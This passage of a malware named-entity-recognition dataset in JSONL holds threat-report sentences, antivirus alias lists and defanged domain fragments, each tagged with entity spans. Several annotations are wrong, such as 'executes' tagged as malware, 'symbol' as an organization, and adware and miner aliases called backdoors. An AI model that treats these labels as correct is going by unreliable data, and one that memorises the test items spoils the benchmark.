"Once thought to be defunct, the resilient Pushdo has surfaced with infections observed in more", "spans": {"Malware: Pushdo": [[42, 48]]}, "info": {"id": "cyner2_valid_001347", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.KillHDD.A Trojan.KillHDD.A Trojan.KillHDD.A Trojan.KillHDD.A Trojan.Dos.KillHDD.flqn KillHDD.A Trojan.DOS-4 Trojan.DOS.KillHDD.a Dos.Trojan.Killhdd.Taew Trojan.KillHDD.A TrojWare.DOS.KillHDD.a Trojan.KillHDD.A Trojan.TestSpeed Trojan.KillHDD.DOS.5 Trojan/KillHdd.a TR/KillHDD.A W32/KillHDD.A!tr Trojan/DOS.KillHDD Trojan.KillHDD.A Troj.DOS.KillHDD.a!c Trojan.KillHDD.A Trojan.DOS.KillHDD.a", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001350", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.MirolanG.Trojan TjnDownldr.Stocde.S16616 Win.Trojan.15532522-1 Trojan.Injector.Win32.358137 Trojan.Zusy.D2B3AD TrojanDownloader:Win32/Stocde.A!bit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001351", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32/Packed_Upack.A Trojan.Crypt-41 Trojan-Spy.Win32.KeyLogger.cc Trojan.Zlob!IK Packed.Win32.MUPACK.~KW TrojanSpy.Keylogger.mn Packed.Win32.UPack PSW.Keylog.S Trj/Pupack.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001352", "source": "cyner2_valid"}} {"text": "] com/ hxxp : //apple-icloud [ .", "spans": {}, "info": {"id": "cyner2_valid_001353", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Heur.Corrupt.PE TrojanDropper:Win32/OverJoiner.2_1.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001354", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9911 Uds.Dangerousobject.Multi!c Trojan.MSIL.Spammer Spammer:MSIL/Misnt.A Trojan/Win32.Tepfer.R109904 Backdoor.Bot Trojan.Spammer!2GUbUR+Ce0w Trj/CI.A Win32/Trojan.Spammer.087", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_001356", "source": "cyner2_valid"}} {"text": "We've seen a plethora of threats that leverage malicious LNK files: from well-known ransomware families, backdoors typically deployed in targeted attacks, and banking Trojans to spam emails, even an exploit to a LNK vulnerability itself.", "spans": {"Malware: threats": [[25, 32]], "Malware: ransomware families, backdoors": [[84, 114]], "Malware: banking Trojans": [[159, 174]], "Malware: exploit": [[199, 206]], "Vulnerability: a LNK vulnerability itself.": [[210, 237]]}, "info": {"id": "cyner2_valid_001357", "source": "cyner2_valid"}} {"text": "Although Ewind is fundamentally adware, monetization through displaying advertising on the victim device, it also includes other functionality such as collecting device data, and forwarding SMS messages to the attacker.", "spans": {"Malware: Ewind": [[9, 14]], "Malware: adware,": [[32, 39]], "System: victim device,": [[91, 105]]}, "info": {"id": "cyner2_valid_001358", "source": "cyner2_valid"}} {"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected .", "spans": {"System: Play store": [[130, 140]]}, "info": {"id": "cyner2_valid_001359", "source": "cyner2_valid"}} {"text": "From the outside , they are indistinguishable from the legitimate applications .", "spans": {}, "info": {"id": "cyner2_valid_001360", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan:MSIL/DNSChanger.E", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001361", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsIemusi.27F7 Trojan/W32.Depok.467814 Virus.Win32.Sality!O Trojan.Depok.Win32.59 Win32.Trojan.WisdomEyes.16070401.9500.9968 Backdoor.Graybird Trojan.Win32.Havar.cvsjm Backdoor.W32.SdBot.leu6 Trojan.MulDrop5.4716 BehavesLike.Win32.FakeAlertSecurityTool.gc Trojan/Depok.aq Trojan/Win32.Depok TrojanDropper:Win32/Frovserp.B 
Trojan.Win32.Z.Packer.467814 Trojan/Win32.Depok.R90764 OScope.Trojan.Diple Trojan.Depok!RTDJO7TWHwY Trojan-Dropper.Delf Win32/Trojan.01f", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001362", "source": "cyner2_valid"}} {"text": "Kaspersky Lab ICS CERT detected a targeted attack aimed at industrial organizations which began in August 2016 and is currently ongoing.", "spans": {"Organization: Kaspersky Lab ICS CERT": [[0, 22]], "Organization: industrial organizations": [[59, 83]]}, "info": {"id": "cyner2_valid_001363", "source": "cyner2_valid"}} {"text": "To add more fuel to an existing fire, the sample was uploaded to VirusTotal from an IP address in Thailand a couple of minutes before the Bangkok Post newspaper reported the theft of 12 million baht from ATMs at banks in Thailand.", "spans": {"Organization: VirusTotal": [[65, 75]], "Organization: the Bangkok Post newspaper": [[134, 160]], "Organization: ATMs": [[204, 208]], "Organization: banks": [[212, 217]]}, "info": {"id": "cyner2_valid_001364", "source": "cyner2_valid"}} {"text": "After a successful infection, RAA executes its main task, i.e. 
encrypts the user's files.", "spans": {"Malware: executes": [[34, 42]]}, "info": {"id": "cyner2_valid_001365", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MSIL TROJ_PICIMGLOD.SM Trojan.Win32.Z.Taily.25600 TROJ_PICIMGLOD.SM TR/Downloader.lwzwe TrojanDownloader:MSIL/Taily.B!bit Trojan-Downloader.MSIL.Small Win32/Trojan.7c5", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001366", "source": "cyner2_valid"}} {"text": "What ’ s more , the numbering of Asacub versions is a continuation of the Smaps system .", "spans": {"Malware: Asacub": [[33, 39]], "Malware: Smaps": [[74, 79]]}, "info": {"id": "cyner2_valid_001367", "source": "cyner2_valid"}} {"text": "We found it to be installing bedep and vawtrak.", "spans": {"Malware: bedep": [[29, 34]], "Malware: vawtrak.": [[39, 47]]}, "info": {"id": "cyner2_valid_001368", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 BehavesLike.Win32.VirRansom.dc Trojan.Heur.E77EF0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001369", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor/Alcodor.b Trojan.Heur.PT.EAD13BE Win32.Trojan.WisdomEyes.16070401.9500.9994 Backdoor.Win32.Alcodor.b Trojan.Win32.Alcodor.dbgk Backdoor.W32.Alcodor.b!c Win32.Backdoor.Alcodor.Hupm Backdoor.Win32.Alcodor.b BackDoor.Tsunami Backdoor.Alcodor.Win32.1 Backdoor.Win32.IRCBot Backdoor/Alcodor.a Trojan[Backdoor]/Win32.Alcodor Backdoor.Win32.Alcodor.b Backdoor.Alcodor Backdoor.Alcodor!NsO2/XMEkFE W32/Alcodor.B!tr Win32/Backdoor.db8", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001370", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Virus.Win32.Dropper Trojan.Adware.Symmi.D781 Trojan:Win32/Korad.C Adware/Win32.KorAd.R31907 Trojan.Downloader.86016 Adware.Kraddare!CwFWIAptaxs Win32/Trojan.Adware.6d7", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_valid_001371", "source": "cyner2_valid"}} {"text": "Our findings from this new campaign include C2 infrastructure, new attack methods, four types of malware including Android malware, a system for management of stolen victim data and some detail of the actors.", "spans": {"System: C2 infrastructure,": [[44, 62]], "Malware: malware": [[97, 104]], "Malware: Android malware,": [[115, 131]], "System: system": [[134, 140]], "System: the actors.": [[197, 208]]}, "info": {"id": "cyner2_valid_001372", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack!OrBfM+IbJYI Backdoor.Trojan Backdoor.Simhack.EX Backdoor.Simhack.EX BDS/Simhack.EX Backdoor.Simhack.EX Backdoor.Simhack.EX W32/SIMHACK.EX!tr.bdr Win32/Backdoor.IM.624", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001373", "source": "cyner2_valid"}} {"text": "Four of the exchanges that were attacked during this timeframe by ITG03 actors were located in South Korea; while this could simply be coincidence given South Korea's large cryptocurrency market, these campaigns against South Korean entities could have the added benefit of meeting ITG03's other motivation of exhibiting force to their enemies.", "spans": {"Organization: cryptocurrency market,": [[173, 195]]}, "info": {"id": "cyner2_valid_001374", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.SysFileB.Trojan Trojan.Win32.VB!O Trojan.VB.Win32.19780 Trojan.Kazy.D7548 Win32.Trojan.VB.hd W32/Trojan2.ERGA Win32/Pacuks.A WORM_SILLY.CC Win.Trojan.VB-7031 Trojan.Win32.VB.evlkqz Trojan.Win32.VB.61699 TrojWare.Win32.Trojan.VB.~XX Trojan.MulDrop3.18059 WORM_SILLY.CC W32/Trojan.ISFS-8468 Trojan/VB.adk TR/VB.aop Trojan/Win32.VB Win32.Troj.VB.ao.kcloud Trojan/Win32.VB.R205901 Trojan.VBO.0441 Trojan.VB!yx+XlInqS1c Trojan.Win32.VB W32/VB.AOO!tr Win32/Trojan.16b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001375", 
"source": "cyner2_valid"}} {"text": "We have observed these new tools being used to target U.S.-based chain restaurants, although FIN7 has previously targeted hospitality organizations, retailers, merchant services, suppliers and others.", "spans": {"Malware: tools": [[27, 32]], "Organization: U.S.-based chain restaurants,": [[54, 83]], "Organization: hospitality organizations, retailers, merchant services, suppliers": [[122, 188]]}, "info": {"id": "cyner2_valid_001376", "source": "cyner2_valid"}} {"text": "Based on this JSON reply , the app looks for an HTML snippet that corresponds to the active element ( show_hide btnnext ) and , if found , the Javascript snippet tries to perform a click ( ) method on it .", "spans": {}, "info": {"id": "cyner2_valid_001377", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Inject.wuxxl TROJ_SPNR.0CCG12 Trojan.Injector!ChMY8oc2Znc Trojan.Win32.S.Klibot.90112.A Trojan.Inject.64029 TR/Buzus.90112.7 TROJ_SPNR.0CCG12 Win32.Troj.Undef.kcloud Trojan:Win32/Klibot.A Virus.Win32.CeeInject W32/Injector.HXK!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001378", "source": "cyner2_valid"}} {"text": "Mcafee has recently seen some interesting tactical changes, including: Attachments with the malicious executable inside Microsoft Office documents that contain a malicious macro.", "spans": {"Organization: Mcafee": [[0, 6]], "System: Microsoft Office documents": [[120, 146]], "Malware: malicious macro.": [[162, 178]]}, "info": {"id": "cyner2_valid_001379", "source": "cyner2_valid"}} {"text": "Before interpreting the opcode , the VM decrypts the opcode ’ s content ( through a simple XOR algorithm ) , which it then relocates ( if needed ) , using the relocation fields .", "spans": {}, "info": {"id": "cyner2_valid_001380", "source": "cyner2_valid"}} {"text": "Specifically, it's the first malware we've seen in the wild that abuses private APIs in the iOS system to implement malicious 
functionalities.", "spans": {"Malware: malware": [[29, 36]], "System: iOS system": [[92, 102]]}, "info": {"id": "cyner2_valid_001381", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Troj.W32.Wildpositron!c Win32.Trojan.WisdomEyes.16070401.9500.9966 Backdoor.Duuzer W32/WildPositron.OTL!tr Trojan/Win32.WildPositron Backdoor:Win32/Escad.S!dha Win32/Trojan.af9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001382", "source": "cyner2_valid"}} {"text": "One of the export calls used is to check if the victimized system is located in Brazil.", "spans": {"Malware: export": [[11, 17]]}, "info": {"id": "cyner2_valid_001383", "source": "cyner2_valid"}} {"text": "After installation, the application runs in the background as service.", "spans": {"System: application": [[24, 35]]}, "info": {"id": "cyner2_valid_001384", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Ronathim.A4 TROJ_VB.DQO Trojan.VB-47165 Trojan.Win32.VB.alvj TR/Kryptik.FA TROJ_VB.DQO Trojan:Win32/Ronathim.A Trojan.Win32.A.VB.245760 Trojan/Win32.VB Trojan.VBRA.013935 Win32/VB.NYR Trojan.Ronathim!4287 W32/VB.ALVJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001385", "source": "cyner2_valid"}} {"text": "Ginp - A malware patchwork borrowing from Anubis November 2019 Intro ThreatFabric analysts have recently investigated an interesting new strain of banking malware .", "spans": {"Malware: Ginp": [[0, 4]], "Malware: Anubis": [[42, 48]], "System: ThreatFabric": [[69, 81]]}, "info": {"id": "cyner2_valid_001386", "source": "cyner2_valid"}} {"text": "campaigns in multiple different countries.", "spans": {}, "info": {"id": "cyner2_valid_001388", "source": "cyner2_valid"}} {"text": "So how does Android.Bankosy take advantage of voice-based 2FA?", "spans": {"Malware: Android.Bankosy": [[12, 27]], "Vulnerability: advantage of voice-based 2FA?": [[33, 62]]}, "info": {"id": "cyner2_valid_001389", "source": "cyner2_valid"}} {"text": 
"A backdoor also known as: Trojan-Downloader.Win32.Apher!O Win32.Trojan.WisdomEyes.16070401.9500.9969 Win32/SillyDl.CSE Trojan-Downloader.Win32.Apher.o TrojWare.Win32.TrojanDownloader.Apher.U0 Trojan.DownLoader6.31749 Trojan-Downloader.Win32.Apher.o Win32/SpyBot.WA.downloader", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001391", "source": "cyner2_valid"}} {"text": "We call it the XM1RPC campaign due to the common backdoor used across all of the compromised sites.", "spans": {"Malware: backdoor": [[49, 57]]}, "info": {"id": "cyner2_valid_001392", "source": "cyner2_valid"}} {"text": "Today, Kelihos is in a festive mood and giving away a free Amazon Gift Card especially for US customers.", "spans": {"Malware: Kelihos": [[7, 14]], "Organization: customers.": [[94, 104]]}, "info": {"id": "cyner2_valid_001393", "source": "cyner2_valid"}} {"text": "The information is then stored in local app database as well as sent to the backend .", "spans": {}, "info": {"id": "cyner2_valid_001395", "source": "cyner2_valid"}} {"text": "This translates into a kit that will largely evade traditional blacklisting solutions.", "spans": {"Malware: kit": [[23, 26]]}, "info": {"id": "cyner2_valid_001396", "source": "cyner2_valid"}} {"text": "I would first like to credit TrendMicro with their initial research on FighterPOS.", "spans": {"Organization: TrendMicro": [[29, 39]], "Malware: FighterPOS.": [[71, 82]]}, "info": {"id": "cyner2_valid_001397", "source": "cyner2_valid"}} {"text": "] it Bologna server3ct.exodus.connexxa [ .", "spans": {}, "info": {"id": "cyner2_valid_001399", "source": "cyner2_valid"}} {"text": "Conclusion Smishing ( SMS phishing ) offers a unique vector to infect mobile users .", "spans": {}, "info": {"id": "cyner2_valid_001400", "source": "cyner2_valid"}} {"text": "] infoal-amalhumandevelopment [ .", "spans": {}, "info": {"id": "cyner2_valid_001401", "source": "cyner2_valid"}} {"text": "Around July last year, more than a 100 Israeli servicemen 
were hit by a cunning threat actor.", "spans": {"Organization: 100 Israeli servicemen": [[35, 57]]}, "info": {"id": "cyner2_valid_001402", "source": "cyner2_valid"}} {"text": "Zscaler ThreatLabZ came across a new Infostealer Trojan written in .NET that utilizes popular tools like Fiddler Json.NET for its operation.", "spans": {"Organization: Zscaler": [[0, 7]], "Organization: ThreatLabZ": [[8, 18]], "Malware: Infostealer Trojan": [[37, 55]], "Malware: tools": [[94, 99]], "Malware: Fiddler Json.NET for": [[105, 125]]}, "info": {"id": "cyner2_valid_001403", "source": "cyner2_valid"}} {"text": "These accounts are created by abusing accessibility services .", "spans": {}, "info": {"id": "cyner2_valid_001404", "source": "cyner2_valid"}} {"text": "This new organization proposed the creation of a more secure Android phone .", "spans": {"System: Android": [[61, 68]]}, "info": {"id": "cyner2_valid_001405", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Dropped:Application.BitCoinMiner.TF BehavesLike.Win32.Trojan.fh TR/Dldr.Bitsadmin.TW TrojanDownloader:Win32/Sminager.F Trj/CI.A Trojan.DL.Alien! 
Dloader.X!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001406", "source": "cyner2_valid"}} {"text": "A backdoor also known as: AdWare.Downloader.Addrop", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001407", "source": "cyner2_valid"}} {"text": "As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear.", "spans": {}, "info": {"id": "cyner2_valid_001408", "source": "cyner2_valid"}} {"text": "The RAT stores all the data in a database ( DB ) in order to send it to the Command & Control ( C & C ) server .", "spans": {}, "info": {"id": "cyner2_valid_001409", "source": "cyner2_valid"}} {"text": "Snake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for targeted attacks.", "spans": {"Malware: Snake,": [[0, 6]], "Malware: Turla, Uroburos": [[21, 36]], "Malware: malware framework": [[76, 93]]}, "info": {"id": "cyner2_valid_001410", "source": "cyner2_valid"}} {"text": "The Trojan for Linux designed to carry out DDoS attacks.", "spans": {"Malware: Trojan for": [[4, 14]], "System: Linux": [[15, 20]]}, "info": {"id": "cyner2_valid_001411", "source": "cyner2_valid"}} {"text": "After the installation, the application does not immediately show its true colours, in fact the malicious activities are postponed for a couple of minutes so users can for example first use the app to open funny videos or watch the latest news.", "spans": {}, "info": {"id": "cyner2_valid_001412", "source": "cyner2_valid"}} {"text": "Figure 1 shows one such landing page using stolen branding from Bank Austria .", "spans": {}, "info": {"id": "cyner2_valid_001413", "source": "cyner2_valid"}} {"text": "A targeted phishing campaign was active in early August 2017 delivering Подписать документы.doc translates to Sign Documents.doc , a MS Word document with an embedded macro responsible for 
dropping both the CHTHONIC banking trojan and DIMNIE spyware to an infected machine.", "spans": {"Malware: embedded macro": [[158, 172]], "Malware: the CHTHONIC banking trojan": [[203, 230]], "Malware: DIMNIE spyware": [[235, 249]], "System: an infected machine.": [[253, 273]]}, "info": {"id": "cyner2_valid_001414", "source": "cyner2_valid"}} {"text": "Example of a command that steals specific files from an infected device ’ s application ( top ) , and GolfSpy ’ s parse-and-perform command ( bottom ) Apart from the HTTP POST method , GolfSpy also creates a socket connection to the remote C & C server in order to receive and perform additional commands .", "spans": {"Malware: GolfSpy": [[102, 109], [185, 192]]}, "info": {"id": "cyner2_valid_001415", "source": "cyner2_valid"}} {"text": "This report describes an elaborately staged malware operation with targets in the Syrian opposition.", "spans": {"Organization: Syrian opposition.": [[82, 100]]}, "info": {"id": "cyner2_valid_001416", "source": "cyner2_valid"}} {"text": "delivered well-known backdoor variants like Gamarue.", "spans": {"Malware: backdoor": [[21, 29]], "Malware: Gamarue.": [[44, 52]]}, "info": {"id": "cyner2_valid_001418", "source": "cyner2_valid"}} {"text": "Sophisticated campaign targeting individuals within the Mongolian government.", "spans": {"Organization: individuals": [[33, 44]], "Organization: the Mongolian government.": [[52, 77]]}, "info": {"id": "cyner2_valid_001419", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.Diamin.a DIAL_DIAMIN.YG Win.Trojan.Dialer-856 Troj.W32.Diamin.l3NB TrojWare.Win32.Diamin.A Dialer.Diamin.68 DIAL_DIAMIN.YG Trojan.Win32.Dialer Trojan:Win32/Diamin.F Trojan/Win32.Dialer.R7699 W32/Dialer.SL!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001420", "source": "cyner2_valid"}} {"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , 
originally from Calabria .", "spans": {}, "info": {"id": "cyner2_valid_001421", "source": "cyner2_valid"}} {"text": "Defense against FinFisher Exposing as much of FinFisher ’ s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware .", "spans": {"Malware: FinFisher": [[16, 25], [46, 55]]}, "info": {"id": "cyner2_valid_001422", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Crypren Ransom.FileCryptor.MSIL Troj.Ransom.W32.Crypren!c Ransom_Cryptid.R020C0DAF18 Trojan-Ransom.Win32.Crypren.aedj Trojan.Win32.Z.Ransom.36864.C Ransom_Cryptid.R020C0DAF18 BehavesLike.Win32.Trojan.nz Trojan.Crypren.kx TR/Paradise.sbeoo Trojan-Ransom.Win32.Crypren.aedj Hoax.Crypren Trj/GdSda.A Win32.Trojan.Crypren.Ecup Trojan-Ransom.FileCoder Win32/Trojan.929", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001423", "source": "cyner2_valid"}} {"text": "With the potential to sell access to these devices to the highest bidder, Check Point researchers say similar malware campaigns may become a trend.", "spans": {"System: devices": [[43, 50]], "Organization: Check Point researchers": [[74, 97]]}, "info": {"id": "cyner2_valid_001425", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W64/Trojan.EUMI-4574 Trojan.Trick.45175 BehavesLike.Win64.Dropper.cm Trojan/Win32.Trickster Trojan:Win64/Totbrick.A Trojan/Win32.Trickster.C1931466 Trojan.Win64.Trickbot", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001426", "source": "cyner2_valid"}} {"text": "Based on the findings, Talos remains confident that the attack was destructive in nature.", "spans": {}, "info": {"id": "cyner2_valid_001427", "source": "cyner2_valid"}} {"text": "In the case reported on by SensePost, this allowed for the fetching or downloading of remote payloads, using PowerShell for example.", "spans": {"Organization: SensePost,": [[27, 37]], "Malware: remote 
payloads,": [[86, 102]], "Malware: PowerShell": [[109, 119]]}, "info": {"id": "cyner2_valid_001428", "source": "cyner2_valid"}} {"text": "APT28 has recently focused on using different themes.", "spans": {}, "info": {"id": "cyner2_valid_001429", "source": "cyner2_valid"}} {"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives .", "spans": {}, "info": {"id": "cyner2_valid_001430", "source": "cyner2_valid"}} {"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud .", "spans": {"System: Android": [[23, 30]]}, "info": {"id": "cyner2_valid_001431", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9986 Trojan.Win32.Pabin.bdv Trojan.Win32.Pabin.etvjly Win32.Trojan.Pabin.Pgmm Trojan.DownLoader26.9492 Trojan.Zusy.D3AED5 Trojan.Win32.Pabin.bdv Trojan:MSIL/Alohahaha.A Trojan/Win32.Pabin.R200797 Trojan.Pabin Trj/GdSda.A Win32/Trojan.Spy.155", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001434", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.DropperFarfli.Trojan Trojan-Dropper.Win32.Binder!O Backdoor.Farfli.O Trojan/Farfli.ej Win32.Backdoor.DarkAngle.a Backdoor.Trojan BKDR_ZEGOST.SMT Win.Spyware.Magania-20683 Backdoor.Win32.Zegost.mtcgx Trojan.Win32.Graz.pmawx Trojan.Win32.A.PSW-Magania.144384.AD Backdoor.Win32.Gh0st.au TrojWare.Win32.Farfli.LK Trojan.DownLoader7.28359 Trojan.Farfli.Win32.5816 BKDR_ZEGOST.SMT W32.Trojan.Farfli TR/Drop.Farfli.E.355 Trojan[GameThief]/Win32.Magania TrojanDropper:Win32/Farfli.E Trojan.Barys.416 Backdoor.Win32.Zegost.mtcgx Dropper/Win32.OnlineGameHack.R3269 TrojanDropper.Binder Trojan.DR.Binder!mFx5gbiyT10 Trojan-GameThief.Win32.Magania Backdoor.Win32.Gh0st.FC", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001435", "source": "cyner2_valid"}} {"text": "In addition to the basic 
functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users.", "spans": {"Malware: backdoors": [[43, 52]], "Malware: T9000": [[62, 67]], "Organization: Skype users.": [[181, 193]]}, "info": {"id": "cyner2_valid_001436", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojanspy.Aolisil Win32.Trojan.WisdomEyes.16070401.9500.9590 Trojan.Win32.Aolisil.exccvy Win32.Trojan.Thief.Azkn Worm.Win32.Dropper.RA TR/Spy.Aolisil.fsmds TrojanSpy:Win32/Aolisil.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001437", "source": "cyner2_valid"}} {"text": "Arid Viper testing new delivery mechanisms", "spans": {}, "info": {"id": "cyner2_valid_001438", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PUP.Optional.BitCoinMiner Application.Heur2.E9960A Win32.Trojan.WisdomEyes.16070401.9500.9516 Win64.Riskware.BitCoinMiner.E not-a-virus:RiskTool.Win64.BitCoinMiner.bll Riskware.Win64.BitCoinMiner.ewmbqa Program.BitCoinMiner.3 W64/Application.OFLM-1880 RiskTool.BitCoinMiner.abf W32.Bitcoinminer not-a-virus:RiskTool.Win64.BitCoinMiner.bll Trojan/Win64.BitCoinMiner.C1716351", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001439", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Kheagol!AxrLEkZrH0Y TrojanDropper:Win32/Kheagol.C Trojan-Banker.Banker HeurEngine.MaliciousPacker Worm.Win32.Viking.pf Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001440", "source": "cyner2_valid"}} {"text": "Otherwise , it will return a JSON encoded \" OK , '' and if that is the case , the command to be executed .", "spans": {}, "info": {"id": "cyner2_valid_001441", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Trojan W32/DLoader.AHYXT WORM_FLYSTUD.SM not-a-virus:AdWare.Win32.FlyStudio.l WORM_FLYSTUD.SM Win32/Nuj.KC Virus.Win32.ScramFly!IK 
Trojan:Win32/Aesevin.B OScope.Trojan.EPL.Goopl Backdoor.Trojan Virus.Win32.ScramFly Trj/FlyStudio.BI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001442", "source": "cyner2_valid"}} {"text": "The 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.", "spans": {}, "info": {"id": "cyner2_valid_001443", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Small.44856 Trojan/VB.rqn Win32.Trojan.WisdomEyes.16070401.9500.9868 W32/Trojan2.IJWB Trojan.Win32.VB.cway Trojan.Win32.VB.bacjn Troj.W32.Vb!c W32/Trojan.KJRG-1539 TR/Gontu.B.dll Trojan/Win32.VB Trojan:Win32/Gontu.B!dll Trojan.Win32.VB.cway Trojan/Win32.VB.R16201 Win32.Trojan.Vb.sti Trojan.VB!RX1Ky6tbhy8 Trojan.Win32.VB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001444", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.HLLW.Deloder.A W32.Deloder W32/Deloder.worm Worm.Deloder.Win32.1 W32.W.Deloder.a!c W32/Deloder.A.worm Win32.HLLW.Deloder.A WORM_DELODER.A W32/Deloder.C W32.HLLW.Deloder Win32/Deloder.A WORM_DELODER.A Win.Worm.Deloder-1 Worm.Win32.Deloder.a Win32.HLLW.Deloder.A Riskware.Win32.PsExec.hqgg Win32.Worm.Deloder.Pbyh Win32.HLLW.Deloder.A Worm.Win32.Deloder.A Win32.HLLW.Deloder.A Win32.HLLW.Deloder W32/Deloder.worm W32/Deloder.HMKZ-0403 Worm:Win32/Deloder.A Worm/Win32.Deloder Worm.Deloder.a.kcloud Worm:Win32/Deloder.A Worm.Win32.Deloder.745984 Worm.Win32.Deloder.a Win32/Deloder.worm.745984 Win32.HLLW.Deloder.A Worm.Deloder I-Worm.Deloder.A I-Worm.Deloder.A Backdoor.Win32.Tsunami Win32.HLLW.Deloder.A W32/Deloder.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001445", "source": "cyner2_valid"}} {"text": "Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it .", "spans": {"Organization: symbol": [[99, 105]]}, "info": {"id": "cyner2_valid_001446", "source": 
"cyner2_valid"}} {"text": "Sakula uses HTTP GET and POST communication for command and control C2.", "spans": {"Malware: Sakula": [[0, 6]]}, "info": {"id": "cyner2_valid_001447", "source": "cyner2_valid"}} {"text": "The primary functionality of this tool is to gather information about the victim.", "spans": {"Malware: tool": [[34, 38]]}, "info": {"id": "cyner2_valid_001448", "source": "cyner2_valid"}} {"text": "Not so long ago, Kaspersky clients in the United States approached Kaspersky researchers with a request to investigate a new type of malicious software that they were able to recover from their organizations' servers.", "spans": {"Organization: Kaspersky clients": [[17, 34]], "Organization: Kaspersky": [[67, 76]], "Malware: malicious software": [[133, 151]], "System: organizations' servers.": [[194, 217]]}, "info": {"id": "cyner2_valid_001449", "source": "cyner2_valid"}} {"text": "This eponymous lurking behavior would earn them notoriety until their operations were stymied and the perpetrators arrested.", "spans": {}, "info": {"id": "cyner2_valid_001450", "source": "cyner2_valid"}} {"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 .", "spans": {}, "info": {"id": "cyner2_valid_001451", "source": "cyner2_valid"}} {"text": "Carbanak is a prolific crime group, well known for stealing over one billion dollars from banks in 2015 *Kaspersky estimated loss and more recently orchestrating an attack on the Oracle Micros POS support site that put over one million Point of Sale systems at risk.", "spans": {"Organization: *Kaspersky": [[104, 114]], 